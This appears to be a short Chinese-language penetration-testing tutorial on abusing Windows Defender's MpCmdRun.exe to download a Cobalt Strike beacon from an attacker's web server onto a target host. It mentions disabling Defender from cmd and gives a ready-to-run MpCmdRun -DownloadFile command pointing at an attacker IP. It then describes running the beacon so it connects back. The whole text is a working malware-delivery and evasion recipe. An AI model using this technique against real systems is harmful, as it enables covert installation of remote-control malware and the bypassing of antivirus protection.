文章前言
Windows Defender是Windows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~
具体实现
Step 1:在cobaltstrike中生成恶意攻击载荷
Step 2:在攻击主机中搭建web服务托管beacon.exe程序
Step 3:在目标主机上使用Windows Defender自带的MpCmdRun.exe程序下载恶意文件
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url http://192.168.188.129:6666/beacon.exe -path c:\\users\\resnd\\Desktop\\c-beacon.exe
Step 4:之后执行恶意文件,可以看到在CS中成功上线
